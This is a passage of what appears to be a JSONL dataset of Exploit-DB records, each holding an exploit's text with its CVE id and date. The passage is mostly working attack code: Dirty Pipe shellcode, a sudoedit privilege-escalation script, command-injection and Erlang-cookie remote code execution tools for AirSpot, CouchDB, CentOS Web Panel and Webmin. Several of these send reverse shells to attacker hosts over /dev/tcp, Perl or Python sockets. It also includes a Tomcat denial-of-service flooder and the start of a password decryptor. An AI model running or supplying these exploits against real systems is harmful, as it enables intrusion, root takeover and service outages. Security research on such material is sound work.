0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,\n\t0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,\n\t0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,\n\t0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n};\n\n/**\n * Create a pipe where all \"bufs\" on the pipe_inode_info ring have the\n * PIPE_BUF_FLAG_CAN_MERGE flag set.\n */\nstatic void prepare_pipe(int p[2])\n{\n\tif (pipe(p)) abort();\n\n\tconst unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);\n\tstatic char buffer[4096];\n\n\t/* fill the pipe completely; each pipe_buffer will now have\n\t the PIPE_BUF_FLAG_CAN_MERGE flag */\n\tfor (unsigned r = pipe_size; r > 0;) {\n\t\tunsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n\t\twrite(p[1], buffer, n);\n\t\tr -= n;\n\t}\n\n\t/* drain the pipe, freeing all pipe_buffer instances (but\n\t", "cve_id": "CVE-2022-0847", "source": "exploitdb", "timestamp": "2022-03-08T00:00:00+00:00"} {"id": "7e264a49bccecebda33f", "text": "Linux Kernel 6.2 - Userspace Processes To Enable Mitigation\n\n## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation\n## Exploit Author: nu11secur1ty\n## CVE ID: CVE-2023-1998\n\n## Description\n## Summary\nThe Linux kernel allows userspace processes to enable mitigations by\ncalling prctl with\n[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html)\nwhich disables the speculation feature as well as by using seccomp. We\nhad noticed that on VMs of at least one major cloud provider, the\nkernel still left the victim process exposed to attacks in some cases\neven after enabling the spectre-BTI mitigation with prctl. The same\nbeahaviour can be observed on a bare-metal machine when forcing the\nmitigation to IBRS on boot comand line.\n\nThis happened because when plain IBRS was enabled (not enhanced IBRS),\nthe kernel had some logic that determined that\n[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)\nwas not needed. The IBRS bit implicitly protects against cross-thread\nbranch target injection. However, with legacy\n[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),\nthe IBRS bit was cleared on returning to userspace, due to performance\nreasons, which disabled the implicit STIBP and left userspace threads\nvulnerable to cross-thread branch target injection against which STIBP\nprotects.\n\n## Severity\nMedium - The kernel failed to protect applications that attempted to\nprotect against Spectre v2 leaving them open to attack from other\nprocesses running on the same physical core in another hyperthread.\n\n## Vulnerable code\nThe Bug present on Kernel 6.2\n(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)\nimplements an optimization that disables STIBP if the mitgation is\nIBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace\nas eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for\nbare metal machines without eIBRS support also triggers the bug.\n\n```c\n /*\n * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,\n * STIBP is not required.\n */\n if (!boot_cpu_has(X86_FEATURE_STIBP) ||\n !smt_possible ||\n spectre_v2_in_ibrs_mode(spectre_v2_enabled))\n return;\n```\n## Proof of Concept\nThe test consists of two processes. The attacker constantly poisons an\nindirect call to speculatively redirect it to a target address. The\nvictim process measures the mispredict rate and tries to mitigate the\nattack either by calling PRCTL or writing to the MSR directly using a\nkernel module that exposes MSR read and write operations to userspace.\n\n```c\n/*\ngcc -o victim test.c -O0 -masm=intel -w -DVICTIM\ngcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL\ngcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM\n-DMSR -DMSR_VAL=0\ngcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1\ngcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2\ngcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR\n-DMSR_VAL=0 -DIBPB\ngcc -o attacker test.c -O0 -masm=intel -w\n*/\n#include \"utils.h\"\n#include \n#include \n#include \n\n#ifndef PRINT_AMMOUNT\n#define PRINT_AMMOUNT 1000\n#endif\n\n#define IA32_SPEC_CTRL 72\n\nuint8_t *rdiPtr;\nuint8_t unused[0x500];\nuint8_t probeArray[0x1000] = {2};\nuint8_t unuse2[0x500];\n\nuint32_t f1() {}\n\nint poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)\n{\n volatile uint8_t d;\n\n unsigned tries = 0;\n unsigned hits = 0;\n unsigned totalHits = 0;\n unsigned totalTries = 0;\n\n jitForLoop(srcAddress);\n\n while (1)\n {\n\n#ifndef VICTIM\n callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);\n continue;\n#else\n\n#ifdef IBPB\n wrmsr_on_cpu(73, cpu, 1);\n#endif\n for (int i = 0; i < 100; i++)\n {\n d = *dstAddress;\n flush((uint8_t *)&rdiPtr);\n callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);\n }\n\n if (probe(&probeArray[0]) < THRESHOLD)\n {\n hits++;\n totalHits++;\n }\n\n totalTries++;\n if (++tries % PRINT_AMMOUNT == 0)\n {\n\n printf(\"Rate: %u/%u MSR[72]=%d\\n\", hits,\ntries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu));\n #ifdef MSR\n wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);\n #endif\n tries = 0;\n hits = 0;\n if (totalTries >= PRINT_AMMOUNT * 10)\n {\n break;\n }\n }\n usleep(1);\n\n#endif\n }\n\n printf(\"Total mispredict rate: %d/%d (%.2f %)\\n\", totalHits,\ntotalTries, (float)totalHits * 100 / (float)totalTries);\n}\n\nint main(int argc, char", "cve_id": "CVE-2023-1998", "source": "exploitdb", "timestamp": "2023-04-20T00:00:00+00:00"} {"id": "884ddc01cd6dd132c678", "text": "sudo 1.8.0 to 1.9.12p1 - Privilege Escalation\n\n#!/usr/bin/env bash\n\n# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation\n# Exploit Author: n3m1.sys\n# CVE: CVE-2023-22809\n# Date: 2023/01/21\n# Vendor Homepage: https://www.sudo.ws/\n# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz\n# Version: 1.8.0 to 1.9.12p1\n# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9\n#\n# Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc\n#\n# Running this exploit on a vulnerable system allows a localiattacker to gain\n# a root shell on the machine.\n#\n# The exploit checks if the current user has privileges to run sudoedit or\n# sudo -e on a file as root. If so it will open the sudoers file for the\n# attacker to add a line to gain privileges on all the files and get a root\n# shell.\n\nif ! sudo --version | head -1 | grep -qE '(1\\.8.*|1\\.9\\.[0-9]1?(p[1-3])?|1\\.9\\.12p1)$'\nthen\n echo \"> Currently installed sudo version is not vulnerable\"\n exit 1\nfi\n\nEXPLOITABLE=$(sudo -l | grep -E \"sudoedit|sudo -e\" | grep -E '\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)' | cut -d ')' -f 2-)\n\nif [ -z \"$EXPLOITABLE\" ]; then\n echo \"> It doesn't seem that this user can run sudoedit as root\"\n read -p \"Do you want to proceed anyway? (y/N): \" confirm && [[ $confirm == [yY] ]] || exit 2\nelse\n echo \"> BINGO! User exploitable\"\n echo \"> Opening sudoers file, please add the following line to the file in order to do the privesc:\"\n echo \"$( whoami ) ALL=(ALL:ALL) ALL\"\n read -n 1 -s -r -p \"Press any key to continue...\"\n EDITOR=\"vim -- /etc/sudoers\" $EXPLOITABLE\n sudo su root\n exit 0\nfi", "cve_id": "CVE-2023-22809", "source": "exploitdb", "timestamp": "2023-04-03T00:00:00+00:00"} {"id": "fb7527eaf320e2e70604", "text": "Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)\n\n# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)\n# Date: 7/26/2022\n# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)\n# Vendor Homepage: https://www.airspan.com/\n# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf\n# Version: 0.3.4.1-4 and under.\n# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)\n# CVE : CVE-2022-36267\n\nfrom __future__ import print_function, unicode_literals\nimport argparse\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\ndef banner():\n airspanLogo = \"\"\"\n ,-.\n / \\ `. __..-,O\n : \\ --''_..-'.'\n | . .-' `. '.\n : . .`.'\n \\ `. / ..\n \\ `. ' .\n `, `. \\\n ,|,`. `-.\\\n '.|| ``-...__..-`\n | | Airspan\n |__| AirSpot 5410\n /||\\ PWNED x_x\n //||\\\\\n // || \\\\\n __//__||__\\\\__\n'--------------'Necrum Security Labs\n\n\\033[1;92mSamy Younsi (Necrum Security Labs)\\033[1;m \\033[1;91mAirSpot 5410 CMD INJECTION\\033[1;m\n FOR EDUCATIONAL PURPOSE ONLY.\n \"\"\"\n return print('\\033[1;94m{}\\033[1;m'.format(airspanLogo))\n\ndef pingWebInterface(RHOST, RPORT):\n url = 'https://{}:{}'.format(RHOST, RPORT)\n try:\n response = requests.get(url, allow_redirects=False, verify=False, timeout=30)\n if response.status_code != 200:\n print('[!] \\033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\\033[1;m')\n exit()\n print('[INFO] Airspan device web interface seems reachable!')\n except:\n print('[!] \\033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\\033[1;m')\n exit()\n\n\ndef execReverseShell(RHOST, RPORT, LHOST, LPORT):\n payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)\n data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)\n try:\n print('[INFO] Executing reverse shell...')\n response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)\n print(\"Reverse shell successfully executed. {}:{}\".format(LHOST, LPORT))\n return\n except Exception as e:\n print(\"Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}\").format(LHOST, LPORT)\n return False\n\ndef main():\n banner()\n args = parser.parse_args()\n pingWebInterface(args.RHOST, args.RPORT)\n execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)\n parser.add_argument('--RHOST', help=\"Refers to the IP of the target machine. (Airspan AirSpot device)\", type=str, required=True)\n parser.add_argument('--RPORT', help=\"Refers to the open port of the target machine. (443 by default)\", type=int, required=True)\n parser.add_argument('--LHOST', help=\"Refers to the IP of your machine.\", type=str, required=True)\n parser.add_argument('--LPORT', help=\"Refers to the open port of your machine.\", type=int, required=True)\n main()", "cve_id": "CVE-2022-36267", "source": "exploitdb", "timestamp": "2022-09-20T00:00:00+00:00"} {"id": "e85adbe6334e983cee10", "text": "Apache CouchDB 3.2.1 - Remote Code Execution (RCE)\n\n# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)\n# Date: 2022-01-21\n# Exploit Author: Konstantin Burov, @_sadshade\n# Software Link: https://couchdb.apache.org/\n# Version: 3.2.1 and below\n# Tested on: Kali 2021.2\n# Based on 1F98D's Erlang Cookie - Remote Code Execution\n# Shodan: port:4369 \"name couchdb at\"\n# CVE: CVE-2022-24706\n# References:\n# https://habr.com/ru/post/661195/\n# https://www.exploit-db.com/exploits/49418\n# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/\n# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce\n#\n#\n#!/usr/local/bin/python3\n\nimport socket\nfrom hashlib import md5\nimport struct\nimport sys\nimport re\nimport time\n\nTARGET = \"\"\nEPMD_PORT = 4369 # Default Erlang distributed port\nCOOKIE = \"monster\" # Default Erlang cookie for CouchDB\nERLNAG_PORT = 0\nEPM_NAME_CMD = b\"\\x00\\x01\\x6e\" # Request for nodes list\n\n# Some data:\nNAME_MSG = b\"\\x00\\x15n\\x00\\x07\\x00\\x03\\x49\\x9cAAAAAA@AAAAAAA\"\nCHALLENGE_REPLY = b\"\\x00\\x15r\\x01\\x02\\x03\\x04\"\nCTRL_DATA = b\"\\x83h\\x04a\\x06gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\"\nCTRL_DATA += b\"\\x00\\x00\\x00\\x00\\x00w\\x00w\\x03rex\"\n\n\ndef compile_cmd(CMD):\n MSG = b\"\\x83h\\x02gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\\x00\\x00\\x00\"\n MSG += b\"\\x00\\x00h\\x05w\\x04callw\\x02osw\\x03cmdl\\x00\\x00\\x00\\x01k\"\n MSG += struct.pack(\">H\", len(CMD))\n MSG += bytes(CMD, 'ascii')\n MSG += b'jw\\x04user'\n PAYLOAD = b'\\x70' + CTRL_DATA + MSG\n PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD\n return PAYLOAD\n\nprint(\"Remote Command Execution via Erlang Distribution Protocol.\\n\")\n\nwhile not TARGET:\n TARGET = input(\"Enter target host:\\n> \")\n\n# Connect to EPMD:\ntry:\n epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n epm_socket.connect((TARGET, EPMD_PORT))\nexcept socket.error as msg:\n print(\"Couldnt connect to EPMD: %s\\n terminating program\" % msg)\n sys.exit(1)\n\nepm_socket.send(EPM_NAME_CMD) #request Erlang nodes\nif epm_socket.recv(4) == b'\\x00\\x00\\x11\\x11': # OK\n data = epm_socket.recv(1024)\n data = data[0:len(data) - 1].decode('ascii')\n data = data.split(\"\\n\")\n if len(data) == 1:\n choise = 1\n print(\"Found \" + data[0])\n else:\n print(\"\\nMore than one node found, choose which one to use:\")\n line_number = 0\n for line in data:\n line_number += 1\n print(\" %d) %s\" %(line_number, line))\n choise = int(input(\"\\n> \"))\n\n ERLNAG_PORT = int(re.search(\"\\d+$\",data[choise - 1])[0])\nelse:\n print(\"Node list request error, exiting\")\n sys.exit(1)\nepm_socket.close()\n\n# Connect to Erlang port:\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((TARGET, ERLNAG_PORT))\nexcept socket.error as msg:\n print(\"Couldnt connect to Erlang server: %s\\n terminating program\" % msg)\n sys.exit(1)\n\ns.send(NAME_MSG)\ns.recv(5) # Receive \"ok\" message\nchallenge = s.recv(1024) # Receive \"challenge\" message\nchallenge = struct.unpack(\">I\", challenge[9:13])[0]\n\n#print(\"Extracted challenge: {}\".format(challenge))\n\n# Add Challenge Digest\nCHALLENGE_REPLY += md5(bytes(COOKIE, \"ascii\")\n + bytes(str(challenge), \"ascii\")).digest()\ns.send(CHALLENGE_REPLY)\nCHALLENGE_RESPONSE = s.recv(1024)\n\nif len(CHALLENGE_RESPONSE) == 0:\n print(\"Authentication failed, exiting\")\n sys.exit(1)\n\nprint(\"Authentication successful\")\nprint(\"Enter command:\\n\")\n\ndata_size = 0\nwhile True:\n if data_size <= 0:\n CMD = input(\"> \")\n if not CMD:\n continue\n elif CMD == \"exit\":\n sys.exit(0)\n s.send(compile_cmd(CMD))\n data_size = struct.unpack(\">I\", s.recv(4))[0] # Get data size\n s.recv(45) # Control message\n data_size -= 45 # Data size without control message\n time.sleep(0.1)\n elif data_size < 1024:\n data = s.recv(data_size)\n #print(\"S---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n time.sleep(0.1)\n print(data.decode())\n data_size = 0\n else:\n data = s.recv(1024)\n #print(\"L---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n time.sleep(0.1)\n print(data.decode(),end = '')\n data_size -= 1024", "cve_id": "CVE-2022-24706", "source": "exploitdb", "timestamp": "2022-05-11T00:00:00+00:00"} {"id": "d55199da767ff798cb4e", "text": "Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)\n\n[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)\n[+] Centos Web Panel 7 - < 0.9.8.1147\n[+] Affected Component ip:2031/login/index.php?login=$(whoami)\n[+] Discoverer: Numan Türle @ Gais Cyber Security\n[+] Author: Numan Türle\n[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194\n[+] CVE: CVE-2022-44877\n\n\nDescription\n--------------\nBash commands can be run because double quotes are used to log incorrect entries to the system.\n\nVideo Proof of Concept\n--------------\nhttps://www.youtube.com/watch?v=kiLfSvc1SYY\n\n\nProof of concept:\n--------------\nPOST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1\nHost: 10.13.37.10:2031\nCookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82\nContent-Length: 40\nOrigin: https://10.13.37.10:2031\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: https://10.13.37.10:2031/login/index.php?login=failed\nAccept-Encoding: gzip, deflate\nAccept-Language: en\nConnection: close\n\nusername=root&password=toor&commit=Login\n--------------\n\nSolution\n--------\nUpgrade to CWP7 current version", "cve_id": "CVE-2022-44877", "source": "exploitdb", "timestamp": "2023-04-01T00:00:00+00:00"} {"id": "661f79d5f95b3f148237", "text": "Webmin 1.984 - Remote Code Execution (Authenticated)\n\n# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)\n# Date: 2022-03-06\n# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)\n# Vendor Homepage: https://www.webmin.com/\n# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip\n# Version: <= 1.984\n# Tested on: Ubuntu 18\n# Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell\n\n\n#!/usr/bin/python3\n\n\"\"\"\nCoded by: @faisalfs10x\nGitHub: https://github.com/faisalfs10x\nReference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/\n\"\"\"\n\nimport requests\nimport urllib3\nimport argparse\nimport os\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nTGREEN = '\\033[32m'\nTRED = '\\033[31m'\nTCYAN = '\\033[36m'\nTSHELL = '\\033[32;1m'\nENDC = '\\033[m'\n\nclass Exploit(object):\n def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):\n self.target = target\n self.username = username\n self.password = password\n self.py3http_server = py3http_server\n self.pyhttp_port = pyhttp_port\n self.upload_path = upload_path\n self.callback_ip = callback_ip\n self.callback_port = callback_port\n self.fname = fname\n\n #self.proxies = proxies\n self.s = requests.Session()\n\n\n def gen_payload(self):\n payload = ('''perl -e 'use Socket;$i=\"''' + self.callback_ip + '''\";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};' ''')\n print(TCYAN + f\"\\n[+] Generating payload to {self.fname} in current directory\", ENDC)\n f = open(f\"{self.fname}\", \"w\")\n f.write(payload)\n f.close()\n\n def login(self):\n login_url = self.target + \"/session_login.cgi\"\n cookies = { \"redirect\": \"1\", \"testing\": \"1\", \"PHPSESSID\": \"\" }\n\n data = { 'user' : self.username, 'pass' : self.password }\n try:\n r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)\n success_message = 'System hostname'\n if success_message in r.text:\n print(TGREEN + \"[+] Login Successful\", ENDC)\n else:\n print(TRED +\"[-] Login Failed\", ENDC)\n exit()\n\n except requests.Timeout as e:\n print(TRED + f\"[-] Target: {self.target} is not responding, Connection timed out\", ENDC)\n exit()\n\n def pyhttp_server(self):\n print(f'[+] Attempt to host http.server on {self.pyhttp_port}\\n')\n os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up\n print('[+] Sleep 3 second to ensure http server is up!')\n time.sleep(3) # Sleep for 3 seconds to ensure http server is up!\n\n def download_remote_url(self):\n download_url = self.target + \"/extensions/file-manager/http_download.cgi?module=filemin\"\n headers = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": self.target + \"/filemin/?xnavigation=1\"\n }\n\n data = {\n 'link': \"http://\" + self.py3http_server + \"/\" + self.fname,\n 'username': '',\n 'password': '',\n 'path': self.upload_path\n }\n\n r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)\n print(f\"\\n[+] Fetching {self.fname} from http.server {self.py3http_server}\")\n\n def modify_permission(self):\n modify_perm_url = self.target + \"/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30\"\n headers = { \"Referer\": self.target + \"/filemin/?xnavigation=1\" }\n data = { \"name\": self.fname, \"perms\": \"0755\", \"applyto\": \"1\", \"path\": self.upload_path }\n\n r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)\n print(f\"[+] Modifying permission of {self.fname} to 0755\")\n\n def exec_revshell(self):\n url = self.target + '/' + self.fname\n try:\n r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)\n except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!\n print(TGREEN + f\"\\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD\", ENDC)\n print(\"[+] Shell location: \" + url)\n else:\n print(TRED + f\"\\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}\", ", "cve_id": "CVE-2022-0824", "source": "exploitdb", "timestamp": "2022-03-09T00:00:00+00:00"} {"id": "114edc02b77918eac6d6", "text": "Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)\n\n# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)\n# Date: 2022-07-25\n# Exploit Author: Emir Polat\n# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165\n# Vendor Homepage: https://www.webmin.com/\n# Software Link: https://www.webmin.com/download.html\n# Version: < 1.997\n# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)\n# CVE: CVE-2022-36446\n\nimport argparse\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef login(args):\n global session\n global sysUser\n\n session = requests.Session()\n loginUrl = f\"{args.target}:10000/session_login.cgi\"\n infoUrl = f\"{args.target}:10000/sysinfo.cgi\"\n\n username = args.username\n password = args.password\n data = {'user': username, 'pass': password}\n\n login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})\n sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})\n\n bs = BeautifulSoup(sysInfo.text, 'html.parser')\n sysUser = [item[\"data-user\"] for item in bs.find_all() if \"data-user\" in item.attrs]\n\n if sysUser:\n return True\n else:\n return False\n\ndef exploit(args):\n payload = f\"\"\"\n 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{args.listenip}\",{args.listenport}));\n os.dup2(s.fileno(),0);\n os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")');\n \"\"\"\n\n updateUrl = f\"{args.target}:10000/package-updates\"\n exploitUrl = f\"{args.target}:10000/package-updates/update.cgi\"\n\n exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}\n\n if login(args):\n print(\"[+] Successfully Logged In !\")\n print(f\"[+] Session Cookie => sid={session.cookies['sid']}\")\n print(f\"[+] User Found => {sysUser[0]}\")\n\n res = session.get(updateUrl)\n bs = BeautifulSoup(res.text, 'html.parser')\n\n updateAccess = [item[\"data-module\"] for item in bs.find_all() if \"data-module\" in item.attrs]\n\n if updateAccess[0] == \"package-updates\":\n print(f\"[+] User '{sysUser[0]}' has permission to access <>\")\n print(f\"[+] Exploit starting ... \")\n print(f\"[+] Shell will spawn to {args.listenip} via port {args.listenport}\")\n\n session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})\n session.post(exploitUrl, data=exploitData)\n else:\n print(f\"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <>\")\n else:\n print(\"[-] Login Failed !\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Webmin < 1.997 - Remote Code Execution (Authenticated)\")\n parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)\n parser.add_argument('-u', '--username', help='Username For Login', required=True)\n parser.add_argument('-p', '--password', help='Password For Login', required=True)\n parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)\n parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)\n parser.add_argument(\"-s\", '--ssl', help=\"Use if server support SSL.\", required=False)\n args = parser.parse_args()\n exploit(args)", "cve_id": "CVE-2022-36446", "source": "exploitdb", "timestamp": "2022-08-01T00:00:00+00:00"} {"id": "d40af3b0225e1b7b639d", "text": "Apache Tomcat 10.1 - Denial Of Service\n\n# Exploit Title: Apache Tomcat 10.1 - Denial Of Service\n# Google Dork: N/A\n# Date: 13/07/2022\n# Exploit Author: Cristian 'void' Giustini\n# Vendor Homepage: https://tomcat.apache.org/\n# Software Link: https://tomcat.apache.org/download-10.cgi\n# Version: <= 10.1\n# Tested on: Apache Tomcat 10.0 (Docker)\n# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)\n# Exploit pre-requirements: pip install pwntools==4.8.0\n# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/\n\n\n\n\n\n#!/usr/bin/env python3\n\n# coding: utf-8\n\nfrom pwn import *\n\nimport time\n\nimport threading\n\nimport subprocess\n\nthreads = []\n\n\n\n\n\ndef send_payload():\n\n r = remote(\"localhost\", 4000)\n\n while True:\n\n r.send(b\"FLT2002\" + b\"A\" * 10000)\n\n\n\nfor _ in range(5):\n\n new_thread = threading.Thread(target=send_payload)\n\n threads.append(new_thread)\n\n new_thread.start()\n\nfor old_thread in threads:\n\n old_thread.join()", "cve_id": "CVE-2022-29885", "source": "exploitdb", "timestamp": "2023-04-05T00:00:00+00:00"} {"id": "5ef923038ba1d2bfbfdf", "text": "Blink1Control2 2.2.7 - Weak Password Encryption\n\n// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption\n// Date: 2022-08-12\n// Exploit Author: p1ckzi\n// Vendor Homepage: https://thingm.com/\n// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7\n// Vulnerable Version: blink1control2 <= 2.2.7\n// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.\n// CVE: CVE-2022-35513\n//\n// Description:\n// the blink1control2 app (versions <= 2.2.7) utilises an insecure method\n// of password storage which can be found by accessing the /blink1/input url\n// of the api server.\n// password ciphertext for skype logins and email are listed\n// and can be decrypted. example usage:\n// node blink1-pass-decrypt \n#!/usr/bin/env node\nconst {ArgumentParser} = require('argparse');\nconst simpleCrypt = require('simplecrypt');\n\nfunction exploit() {\n const BANNER = '\\033[36m\\n\\\n _ _ _ _ _\\n\\\n | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\\n\\\n | \\'_ \\\\| | | \\'_ \\\\| |/ | |_____| \\'_ \\\\ / _` / __/ __|_____\\n\\\n | |_) | | | | | | <| |_____| |_) | (_| \\\\__ \\\\__ |_____|\\n\\\n |_.__/|_|_|_| |_|_|\\\\_|_| | .__/ \\\\__,_|___|___/\\n\\\n |_|\\n\\\n _ 